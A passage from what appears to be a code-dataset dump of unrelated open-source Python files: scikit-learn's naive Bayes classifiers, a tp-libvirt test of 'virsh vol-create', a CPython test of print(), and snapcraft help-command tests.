Must be provided at the first call to partial_fit, can be omitted
in subsequent calls.
_refit: bool
If true, act as though this were the first time we called
_partial_fit (ie, throw away any past fitting and start over).
sample_weight : array-like, shape (n_samples,), optional
Weights applied to individual samples (1. for unweighted).
Returns
-------
self : object
Returns self.
"""
X, y = check_X_y(X, y)
# If the ratio of data variance between dimensions is too small, it
# will cause numerical errors. To address this, we artificially
# boost the variance by epsilon, a small fraction of the standard
# deviation of the largest dimension.
epsilon = 1e-9 * np.var(X, axis=0).max()
if _refit:
self.classes_ = None
if _check_partial_fit_first_call(self, classes):
# This is the first call to partial_fit:
# initialize various cumulative counters
n_features = X.shape[1]
n_classes = len(self.classes_)
self.theta_ = np.zeros((n_classes, n_features))
self.sigma_ = np.zeros((n_classes, n_features))
self.class_prior_ = np.zeros(n_classes)
self.class_count_ = np.zeros(n_classes)
else:
if X.shape[1] != self.theta_.shape[1]:
msg = "Number of features %d does not match previous data %d."
raise ValueError(msg % (X.shape[1], self.theta_.shape[1]))
# Put epsilon back in each time
self.sigma_[:, :] -= epsilon
classes = self.classes_
unique_y = np.unique(y)
unique_y_in_classes = in1d(unique_y, classes)
if not np.all(unique_y_in_classes):
raise ValueError("The target label(s) %s in y do not exist in the "
"initial classes %s" %
(y[~unique_y_in_classes], classes))
for y_i in unique_y:
i = classes.searchsorted(y_i)
X_i = X[y == y_i, :]
if sample_weight is not None:
sw_i = sample_weight[y == y_i]
N_i = sw_i.sum()
else:
sw_i = None
N_i = X_i.shape[0]
new_theta, new_sigma = self._update_mean_variance(
self.class_count_[i], self.theta_[i, :], self.sigma_[i, :],
X_i, sw_i)
self.theta_[i, :] = new_theta
self.sigma_[i, :] = new_sigma
self.class_count_[i] += N_i
self.sigma_[:, :] += epsilon
self.class_prior_[:] = self.class_count_ / np.sum(self.class_count_)
return self
def _joint_log_likelihood(self, X):
check_is_fitted(self, "classes_")
X = check_array(X)
joint_log_likelihood = []
for i in range(np.size(self.classes_)):
jointi = np.log(self.class_prior_[i])
n_ij = - 0.5 * np.sum(np.log(2. * np.pi * self.sigma_[i, :]))
n_ij -= 0.5 * np.sum(((X - self.theta_[i, :]) ** 2) /
(self.sigma_[i, :]), 1)
joint_log_likelihood.append(jointi + n_ij)
joint_log_likelihood = np.array(joint_log_likelihood).T
return joint_log_likelihood
class BaseDiscreteNB(BaseNB):
"""Abstract base class for naive Bayes on discrete/categorical data
Any estimator based on this class should provide:
__init__
_joint_log_likelihood(X) as per BaseNB
"""
def _update_class_log_prior(self, class_prior=None):
n_classes = len(self.classes_)
if class_prior is not None:
if len(class_prior) != n_classes:
raise ValueError("Number of priors must match number of"
" classes.")
self.class_log_prior_ = np.log(class_prior)
elif self.fit_prior:
# empirical prior, with sample_weight taken into account
self.class_log_prior_ = (np.log(self.class_count_)
- np.log(self.class_count_.sum()))
else:
self.class_log_prior_ = np.zeros(n_classes) - np.log(n_classes)
def partial_fit(self, X, y, classes=None, sample_weight=None):
"""Incremental fit on a batch of samples.
This method is expected to be called several times consecutively
on different chunks of a dataset so as to implement out-of-core
or online learning.
This is especially useful when the whole dataset is too big to fit in
memory at once.
This method has some performance overhead hence it is better to call
partial_fit on chunks of data that are as large as possible
(as long as fitting in the memory budget) to hide the overhead.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape = [n_samples]
Target values.
classes : array-like, shape = [n_classes]
List of all the classes that can possibly appear in the y vector.
Must be provided at the first call to partial_fit, can be omitted
in subsequent calls.
sample_weight : array-like, shape = [n_samples], optional
Weights applied to individual samples (1. for unweighted).
Returns
-------
self : object
Returns self.
"""
X = check_array(X, accept_sparse='csr', dtype=np.float64)
_, n_features = X.shape
if _check_partial_fit_first_call(self, classes):
# This is the first call to partial_fit:
# initialize various cumulative counters
n_effective_classes = len(classes) if len(classes) > 1 else 2
self.class_count_ = np.zeros(n_effective_classes, dtype=np.float64)
self.feature_count_ = np.zeros((n_effective_classes, n_features),
dtype=np.float64)
elif n_features != self.coef_.shape[1]:
msg = "Number of features %d does not match previous data %d."
raise ValueError(msg % (n_features, self.coef_.shape[-1]))
Y = label_binarize(y, classes=self.classes_)
if Y.shape[1] == 1:
Y = np.concatenate((1 - Y, Y), axis=1)
n_samples, n_classes = Y.shape
if X.shape[0] != Y.shape[0]:
msg = "X.shape[0]=%d and y.shape[0]=%d are incompatible."
raise ValueError(msg % (X.shape[0], y.shape[0]))
# label_binarize() returns arrays with dtype=np.int64.
# We convert it to np.float64 to support sample_weight consistently
Y = Y.astype(np.float64)
if sample_weight is not None:
sample_weight = np.atleast_2d(sample_weight)
Y *= check_array(sample_weight).T
class_prior = self.class_prior
# Count raw events from data before updating the class log prior
# and feature log probas
self._count(X, Y)
# XXX: OPTIM: we could introduce a public finalization method to
# be called by the user explicitly just once after several consecutive
# calls to partial_fit and prior any call to predict[_[log_]proba]
# to avoid computing the smooth log probas at each call to partial fit
self._update_feature_log_prob()
self._update_class_log_prior(class_prior=class_prior)
return self
def fit(self, X, y, sample_weight=None):
"""Fit Naive Bayes classifier according to X, y
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape = [n_samples]
Target values.
sample_weight : array-like, shape = [n_samples], optional
Weights applied to individual samples (1. for unweighted).
Returns
-------
self : object
Returns self.
"""
X, y = check_X_y(X, y, 'csr')
_, n_features = X.shape
labelbin = LabelBinarizer()
Y = labelbin.fit_transform(y)
self.classes_ = labelbin.classes_
if Y.shape[1] == 1:
Y = np.concatenate((1 - Y, Y), axis=1)
# LabelBinarizer().fit_transform() returns arrays with dtype=np.int64.
# We convert it to np.float64 to support sample_weight consistently;
# this means we also don't have to cast X to floating point
Y = Y.astype(np.float64)
if sample_weight is not None:
sample_weight = np.atleast_2d(sample_weight)
Y *= check_array(sample_weight).T
class_prior = self.class_prior
# Count raw events from data before updating the class log prior
# and feature log probas
n_effective_classes = Y.shape[1]
self.class_count_ = np.zeros(n_effective_classes, dtype=np.float64)
self.feature_count_ = np.zeros((n_effective_classes, n_features),
dtype=np.float64)
self._count(X, Y)
self._update_feature_log_prob()
self._update_class_log_prior(class_prior=class_prior)
return self
# XXX The following is a stopgap measure; we need to set the dimensions
# of class_log_prior_ and feature_log_prob_ correctly.
def _get_coef(self):
return (self.feature_log_prob_[1:]
if len(self.classes_) == 2 else self.feature_log_prob_)
def _get_intercept(self):
return (self.class_log_prior_[1:]
if len(self.classes_) == 2 else self.class_log_prior_)
coef_ = property(_get_coef)
intercept_ = property(_get_intercept)
class MultinomialNB(BaseDiscreteNB):
"""
Naive Bayes classifier for multinomial models
The multinomial Naive Bayes classifier is suitable for classification with
discrete features (e.g., word counts for text classification). The
multinomial distribution normally requires integer feature counts. However,
in practice, fractional counts such as tf-idf may also work.
Read more in the :ref:`User Guide <multinomial_naive_bayes>`.
Parameters
----------
alpha : float, optional (default=1.0)
Additive (Laplace/Lidstone) smoothing parameter
(0 for no smoothing).
fit_prior : boolean
Whether to learn class prior probabilities or not.
If false, a uniform prior will be used.
class_prior : array-like, size (n_classes,)
Prior probabilities of the classes. If specified the priors are not
adjusted according to the data.
Attributes
----------
class_log_prior_ : array, shape (n_classes, )
Smoothed empirical log probability for each class.
intercept_ : property
Mirrors ``class_log_prior_`` for interpreting MultinomialNB
as a linear model.
feature_log_prob_ : array, shape (n_classes, n_features)
Empirical log probability of features
given a class, ``P(x_i|y)``.
coef_ : property
Mirrors ``feature_log_prob_`` for interpreting MultinomialNB
as a linear model.
class_count_ : array, shape (n_classes,)
Number of samples encountered for each class during fitting. This
value is weighted by the sample weight when provided.
feature_count_ : array, shape (n_classes, n_features)
Number of samples encountered for each (class, feature)
during fitting. This value is weighted by the sample weight when
provided.
Examples
--------
>>> import numpy as np
>>> X = np.random.randint(5, size=(6, 100))
>>> y = np.array([1, 2, 3, 4, 5, 6])
>>> from sklearn.naive_bayes import MultinomialNB
>>> clf = MultinomialNB()
>>> clf.fit(X, y)
MultinomialNB(alpha=1.0, class_prior=None, fit_prior=True)
>>> print(clf.predict(X[2:3]))
[3]
Notes
-----
For the rationale behind the names `coef_` and `intercept_`, i.e.
naive Bayes as a linear classifier, see J. Rennie et al. (2003),
Tackling the poor assumptions of naive Bayes text classifiers, ICML.
References
----------
C.D. Manning, P. Raghavan and H. Schuetze (2008). Introduction to
Information Retrieval. Cambridge University Press, pp. 234-265.
http://nlp.stanford.edu/IR-book/html/htmledition/naive-bayes-text-classification-1.html
"""
def __init__(self, alpha=1.0, fit_prior=True, class_prior=None):
self.alpha = alpha
self.fit_prior = fit_prior
self.class_prior = class_prior
def _count(self, X, Y):
"""Count and smooth feature occurrences."""
if np.any((X.data if issparse(X) else X) < 0):
raise ValueError("Input X must be non-negative")
self.feature_count_ += safe_sparse_dot(Y.T, X)
self.class_count_ += Y.sum(axis=0)
def _update_feature_log_prob(self):
"""Apply smoothing to raw counts and recompute log probabilities"""
smoothed_fc = self.feature_count_ + self.alpha
smoothed_cc = smoothed_fc.sum(axis=1)
self.feature_log_prob_ = (np.log(smoothed_fc)
- np.log(smoothed_cc.reshape(-1, 1)))
def _joint_log_likelihood(self, X):
"""Calculate the posterior log probability of the samples X"""
check_is_fitted(self, "classes_")
X = check_array(X, accept_sparse='csr')
return (safe_sparse_dot(X, self.feature_log_prob_.T)
+ self.class_log_prior_)
class BernoulliNB(BaseDiscreteNB):
"""Naive Bayes classifier for multivariate Bernoulli models.
Like MultinomialNB, this classifier is suitable for discrete data. The
difference is that while MultinomialNB works with occurrence counts,
BernoulliNB is designed for binary/boolean features.
Read more in the :ref:`User Guide <bernoulli_naive_bayes>`.
Parameters
----------
alpha : float, optional (default=1.0)
Additive (Laplace/Lidstone) smoothing parameter
(0 for no smoothing).
binarize : float or None, optional
Threshold for binarizing (mapping to booleans) of sample features.
If None, input is presumed to already consist of binary vectors.
fit_prior : boolean
Whether to learn class prior probabilities or not.
If false, a uniform prior will be used.
class_prior : array-like, size=[n_classes,]
Prior probabilities of the classes. If specified the priors are not
adjusted according to the data.
Attributes
----------
class_log_prior_ : array, shape = [n_classes]
Log probability of each class (smoothed).
feature_log_prob_ : array, shape = [n_classes, n_features]
Empirical log probability of features given a class, P(x_i|y).
class_count_ : array, shape = [n_classes]
Number of samples encountered for each class during fitting. This
value is weighted by the sample weight when provided.
feature_count_ : array, shape = [n_classes, n_features]
Number of samples encountered for each (class, feature)
during fitting. This value is weighted by the sample weight when
provided.
Examples
--------
>>> import numpy as np
>>> X = np.random.randint(2, size=(6, 100))
>>> Y = np.array([1, 2, 3, 4, 4, 5])
>>> from sklearn.naive_bayes import BernoulliNB
>>> clf = BernoulliNB()
>>> clf.fit(X, Y)
BernoulliNB(alpha=1.0, binarize=0.0, class_prior=None, fit_prior=True)
>>> print(clf.predict(X[2:3]))
[3]
References
----------
C.D. Manning, P. Raghavan and H. Schuetze (2008). Introduction to
Information Retrieval. Cambridge University Press, pp. 234-265.
http://nlp.stanford.edu/IR-book/html/htmledition/the-bernoulli-model-1.html
A. McCallum and K. Nigam (1998). A comparison of event models for naive
Bayes text classification. Proc. AAAI/ICML-98 Workshop on Learning for
Text Categorization, pp. 41-48.
V. Metsis, I. Androutsopoulos and G. Paliouras (2006). Spam filtering with
naive Bayes -- Which naive Bayes? 3rd Conf. on Email and Anti-Spam (CEAS).
"""
def __init__(self, alpha=1.0, binarize=.0, fit_prior=True,
class_prior=None):
self.alpha = alpha
self.binarize = binarize
self.fit_prior = fit_prior
self.class_prior = class_prior
def _count(self, X, Y):
"""Count and smooth feature occurrences."""
if self.binarize is not None:
X = binarize(X, threshold=self.binarize)
self.feature_count_ += safe_sparse_dot(Y.T, X)
self.class_count_ += Y.sum(axis=0)
def _update_feature_log_prob(self):
"""Apply smoothing to raw counts and recompute log probabilities"""
smoothed_fc = self.feature_count_ + self.alpha
smoothed_cc = self.class_count_ + self.alpha * 2
self.feature_log_prob_ = (np.log(smoothed_fc)
- np.log(smoothed_cc.reshape(-1, 1)))
def _joint_log_likelihood(self, X):
"""Calculate the posterior log probability of the samples X"""
check_is_fitted(self, "classes_")
X = check_array(X, accept_sparse='csr')
if self.binarize is not None:
X = binarize(X, threshold=self.binarize)
n_classes, n_features = self.feature_log_prob_.shape
n_samples, n_features_X = X.shape
if n_features_X != n_features:
raise ValueError("Expected input with %d features, got %d instead"
% (n_features, n_features_X))
neg_prob = np.log(1 - np.exp(self.feature_log_prob_))
# Compute neg_prob · (1 - X).T as ∑neg_prob - X · neg_prob
jll = safe_sparse_dot(X, (self.feature_log_prob_ - neg_prob).T)
jll += self.class_log_prior_ + neg_prob.sum(axis=1)
return jll
| bsd-3-clause |
PandaWei/tp-libvirt | libvirt/tests/src/virsh_cmd/volume/virsh_vol_create.py | 1 | 6363 | import os
import logging
from virttest import virsh, libvirt_storage, libvirt_xml
from virttest.utils_test import libvirt as utlv
from autotest.client.shared import error
from autotest.client import utils
from provider import libvirt_version
def run(test, params, env):
"""
Test virsh vol-create command to cover the following matrix:
pool_type = [dir, fs, netfs]
volume_format = [raw, bochs, cloop, cow, dmg, iso, qcow, qcow2, qed,
vmdk, vpc]
pool_type = [disk]
volume_format = [none, linux, fat16, fat32, linux-swap, linux-lvm,
linux-raid, extended]
pool_type = [logical]
volume_format = [none]
pool_type = [iscsi, scsi]
Not supported with format type
TODO:
pool_type = [rbd, glusterfs]
Reference: http://www.libvirt.org/storage.html
"""
src_pool_type = params.get("src_pool_type")
src_pool_target = params.get("src_pool_target")
src_emulated_image = params.get("src_emulated_image")
extra_option = params.get("extra_option", "")
vol_name = params.get("vol_name", "vol_create_test")
vol_format = params.get("vol_format")
lazy_refcounts = "yes" == params.get("lazy_refcounts")
status_error = "yes" == params.get("status_error", "no")
# Set volume xml attribute dictionary, extract all params start with 'vol_'
# which are for setting volume xml, except 'lazy_refcounts'.
vol_arg = {}
for key in params.keys():
if key.startswith('vol_'):
if key[4:] in ['capacity', 'allocation', 'owner', 'group']:
vol_arg[key[4:]] = int(params[key])
else:
vol_arg[key[4:]] = params[key]
vol_arg['lazy_refcounts'] = lazy_refcounts
pool_type = ['dir', 'disk', 'fs', 'logical', 'netfs', 'iscsi', 'scsi']
if src_pool_type not in pool_type:
raise error.TestNAError("pool type %s not in supported type list: %s" %
(src_pool_type, pool_type))
if not libvirt_version.version_compare(1, 0, 0):
if "--prealloc-metadata" in extra_option:
raise error.TestNAError("metadata preallocation not supported in"
+ " current libvirt version.")
# libvirt acl polkit related params
uri = params.get("virsh_uri")
unprivileged_user = params.get('unprivileged_user')
if unprivileged_user:
if unprivileged_user.count('EXAMPLE'):
unprivileged_user = 'testacl'
if not libvirt_version.version_compare(1, 1, 1):
if params.get('setup_libvirt_polkit') == 'yes':
raise error.TestNAError("API acl test not supported in current"
+ " libvirt version.")
try:
# Create the src pool
src_pool_name = "virt-%s-pool" % src_pool_type
pvt = utlv.PoolVolumeTest(test, params)
pvt.pre_pool(src_pool_name, src_pool_type, src_pool_target,
src_emulated_image, image_size="2G",
pre_disk_vol=["1M"])
# Print current pools for debugging
logging.debug("Current pools:%s",
libvirt_storage.StoragePool().list_pools())
# Set volume xml file
volxml = libvirt_xml.VolXML()
newvol = volxml.new_vol(**vol_arg)
vol_xml = newvol['xml']
if params.get('setup_libvirt_polkit') == 'yes':
utils.run("chmod 666 %s" % vol_xml, ignore_status=True)
# Run virsh_vol_create to create vol
logging.debug("create volume from xml: %s" % newvol.xmltreefile)
cmd_result = virsh.vol_create(src_pool_name, vol_xml, extra_option,
unprivileged_user=unprivileged_user,
uri=uri, ignore_status=True, debug=True)
status = cmd_result.exit_status
# Check result
if not status_error:
if not status:
src_pv = libvirt_storage.PoolVolume(src_pool_name)
src_volumes = src_pv.list_volumes().keys()
logging.debug("Current volumes in %s: %s",
src_pool_name, src_volumes)
if vol_name not in src_volumes:
raise error.TestFail("Can't find volume: %s from pool: %s"
% (vol_name, src_pool_name))
# check format in volume xml
post_xml = volxml.new_from_vol_dumpxml(vol_name, src_pool_name)
logging.debug("the created volume xml is: %s" %
post_xml.xmltreefile)
if 'format' in post_xml.keys():
if post_xml.format != vol_format:
raise error.TestFail("Volume format %s is not expected"
% vol_format + " as defined.")
else:
# Skip the format not supported by qemu-img error
if vol_format:
fmt_err = "Unknown file format '%s'" % vol_format
fmt_err1 = "Formatting or formatting option not "
fmt_err1 += "supported for file format '%s'" % vol_format
fmt_err2 = "Driver '%s' does not support " % vol_format
fmt_err2 += "image creation"
if "qemu-img" in cmd_result.stderr:
er = cmd_result.stderr
if fmt_err in er or fmt_err1 in er or fmt_err2 in er:
err_msg = "Volume format '%s' is not" % vol_format
err_msg += " supported by qemu-img."
raise error.TestNAError(err_msg)
else:
raise error.TestFail("Run failed with right command.")
else:
raise error.TestFail("Run failed with right command.")
else:
if status:
logging.debug("Expect error: %s", cmd_result.stderr)
else:
raise error.TestFail("Expect fail, but run successfully!")
finally:
# Cleanup
try:
pvt.cleanup_pool(src_pool_name, src_pool_type, src_pool_target,
src_emulated_image)
except error.TestFail, detail:
logging.error(str(detail))
| gpl-2.0 |
mancoast/CPythonPyc_test | fail/330_test_print.py | 34 | 4682 | """Test correct operation of the print function.
"""
# In 2.6, this gives us the behavior we want. In 3.0, it has
# no function, but it still must parse correctly.
from __future__ import print_function
import unittest
from test import support
try:
# 3.x
from io import StringIO
except ImportError:
# 2.x
from StringIO import StringIO
NotDefined = object()
# A dispatch table all 8 combinations of providing
# sep, end, and file
# I use this machinery so that I'm not just passing default
# values to print, I'm either passing or not passing in the
# arguments
dispatch = {
(False, False, False):
lambda args, sep, end, file: print(*args),
(False, False, True):
lambda args, sep, end, file: print(file=file, *args),
(False, True, False):
lambda args, sep, end, file: print(end=end, *args),
(False, True, True):
lambda args, sep, end, file: print(end=end, file=file, *args),
(True, False, False):
lambda args, sep, end, file: print(sep=sep, *args),
(True, False, True):
lambda args, sep, end, file: print(sep=sep, file=file, *args),
(True, True, False):
lambda args, sep, end, file: print(sep=sep, end=end, *args),
(True, True, True):
lambda args, sep, end, file: print(sep=sep, end=end, file=file, *args),
}
# Class used to test __str__ and print
class ClassWith__str__:
def __init__(self, x):
self.x = x
def __str__(self):
return self.x
class TestPrint(unittest.TestCase):
def check(self, expected, args,
sep=NotDefined, end=NotDefined, file=NotDefined):
# Capture sys.stdout in a StringIO. Call print with args,
# and with sep, end, and file, if they're defined. Result
# must match expected.
# Look up the actual function to call, based on if sep, end, and file
# are defined
fn = dispatch[(sep is not NotDefined,
end is not NotDefined,
file is not NotDefined)]
with support.captured_stdout() as t:
fn(args, sep, end, file)
self.assertEqual(t.getvalue(), expected)
def test_print(self):
def x(expected, args, sep=NotDefined, end=NotDefined):
# Run the test 2 ways: not using file, and using
# file directed to a StringIO
self.check(expected, args, sep=sep, end=end)
# When writing to a file, stdout is expected to be empty
o = StringIO()
self.check('', args, sep=sep, end=end, file=o)
# And o will contain the expected output
self.assertEqual(o.getvalue(), expected)
x('\n', ())
x('a\n', ('a',))
x('None\n', (None,))
x('1 2\n', (1, 2))
x('1 2\n', (1, ' ', 2))
x('1*2\n', (1, 2), sep='*')
x('1 s', (1, 's'), end='')
x('a\nb\n', ('a', 'b'), sep='\n')
x('1.01', (1.0, 1), sep='', end='')
x('1*a*1.3+', (1, 'a', 1.3), sep='*', end='+')
x('a\n\nb\n', ('a\n', 'b'), sep='\n')
x('\0+ +\0\n', ('\0', ' ', '\0'), sep='+')
x('a\n b\n', ('a\n', 'b'))
x('a\n b\n', ('a\n', 'b'), sep=None)
x('a\n b\n', ('a\n', 'b'), end=None)
x('a\n b\n', ('a\n', 'b'), sep=None, end=None)
x('*\n', (ClassWith__str__('*'),))
x('abc 1\n', (ClassWith__str__('abc'), 1))
# # 2.x unicode tests
# x(u'1 2\n', ('1', u'2'))
# x(u'u\1234\n', (u'u\1234',))
# x(u' abc 1\n', (' ', ClassWith__str__(u'abc'), 1))
# errors
self.assertRaises(TypeError, print, '', sep=3)
self.assertRaises(TypeError, print, '', end=3)
self.assertRaises(AttributeError, print, '', file='')
def test_print_flush(self):
# operation of the flush flag
class filelike():
def __init__(self):
self.written = ''
self.flushed = 0
def write(self, str):
self.written += str
def flush(self):
self.flushed += 1
f = filelike()
print(1, file=f, end='', flush=True)
print(2, file=f, end='', flush=True)
print(3, file=f, flush=False)
self.assertEqual(f.written, '123\n')
self.assertEqual(f.flushed, 2)
# ensure exceptions from flush are passed through
class noflush():
def write(self, str):
pass
def flush(self):
raise RuntimeError
self.assertRaises(RuntimeError, print, 1, file=noflush(), flush=True)
def test_main():
support.run_unittest(TestPrint)
if __name__ == "__main__":
test_main()
| gpl-3.0 |
jocave/snapcraft | snapcraft/tests/test_commands_help.py | 2 | 5384 | # -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2015, 2016 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import logging
import io
import pydoc
from unittest import mock
import fixtures
from snapcraft._help import _TOPICS
from snapcraft.main import main
from snapcraft import tests
class HelpCommandTestCase(tests.TestCase):
def setUp(self):
super().setUp()
# pydoc pager guess can fail, for tests we want a plain pager
# anyway
p = mock.patch('pydoc.pager', new=pydoc.plainpager)
p.start()
self.addCleanup(p.stop)
def test_topic_and_plugin_not_found_exits_with_tip(self):
fake_logger = fixtures.FakeLogger(level=logging.ERROR)
self.useFixture(fake_logger)
with self.assertRaises(SystemExit) as raised:
main(['help', 'does-not-exist'])
self.assertEqual(1, raised.exception.code)
self.assertEqual(
fake_logger.output,
'The plugin does not exist. Run `snapcraft '
'list-plugins` to see the available plugins.\n')
@mock.patch('sys.stdout', new_callable=io.StringIO)
def test_print_module_help_when_no_help_for_valid_plugin(
self, mock_stdout):
main(['help', 'jdk'])
self.assertEqual('The plugin has no documentation\n',
mock_stdout.getvalue())
@mock.patch('sys.stdout', new_callable=io.StringIO)
def test_print_module_help_for_valid_plugin(self, mock_stdout):
main(['help', 'nil'])
expected = 'The nil plugin is'
output = mock_stdout.getvalue()[:len(expected)]
self.assertEqual(output, expected,
'The help message does not start with {!r} but with '
'{!r} instead'.format(expected, output))
@mock.patch('sys.stdout', new_callable=io.StringIO)
def test_show_module_help_with_devel_for_valid_plugin(self, mock_stdout):
main(['help', 'nil', '--devel'])
expected = 'Help on module snapcraft.plugins.nil in snapcraft.plugins'
output = mock_stdout.getvalue()[:len(expected)]
self.assertEqual(output, expected,
'The help message does not start with {!r} but with '
'{!r} instead'.format(expected, output))
@mock.patch('sys.stdout', new_callable=io.StringIO)
def test_print_topics(self, mock_stdout):
main(['help', 'topics'])
output = mock_stdout.getvalue().strip().split('\n')
for t in _TOPICS:
self.assertTrue(
t in output, 'Missing topic: {!r} in {!r}'.format(t, output))
@mock.patch('sys.stdout', new_callable=io.StringIO)
def test_print_topic_help_for_valid_topic(self, mock_stdout):
main(['help', 'sources'])
expected = "Common 'source' options."
output = mock_stdout.getvalue()[:len(expected)]
self.assertEqual(output, expected,
'The help message does not start with {!r} but with '
'{!r} instead'.format(expected, output))
@mock.patch('sys.stdout', new_callable=io.StringIO)
def test_print_topic_help_with_devel_for_valid_topic(self, mock_stdout):
expected = {
'sources': 'Help on module snapcraft',
'plugins': 'Help on package snapcraft',
}
for key in _TOPICS:
mock_stdout.truncate(0)
mock_stdout.seek(0)
with self.subTest(key=key):
main(['help', key, '--devel'])
output = mock_stdout.getvalue()[:len(expected[key])]
self.assertEqual(
output, expected[key],
'The help message does not start with {!r} but with '
'{!r} instead'.format(expected[key], output))
@mock.patch('sys.stdout', new_callable=io.StringIO)
def test_no_unicode_in_help_strings(self, mock_stdout):
helps = ['topics']
for key in _TOPICS.keys():
helps.append(str(key))
# Get a list of plugins
import snapcraft.plugins
import os
from pathlib import Path
for plugin in Path(snapcraft.plugins.__path__[0]).glob('*.py'):
if (os.path.isfile(str(plugin)) and
not os.path.basename(str(plugin)).startswith('_')):
helps.append(os.path.basename(str(plugin)[:-3]))
for key in helps:
mock_stdout.truncate(0)
mock_stdout.seek(0)
with self.subTest(key=key):
main(['help', key])
try:
mock_stdout.getvalue().encode('ascii')
except UnicodeEncodeError:
self.fail('Non-ASCII characters in help text for '
'{!r}'.format(key))
| gpl-3.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.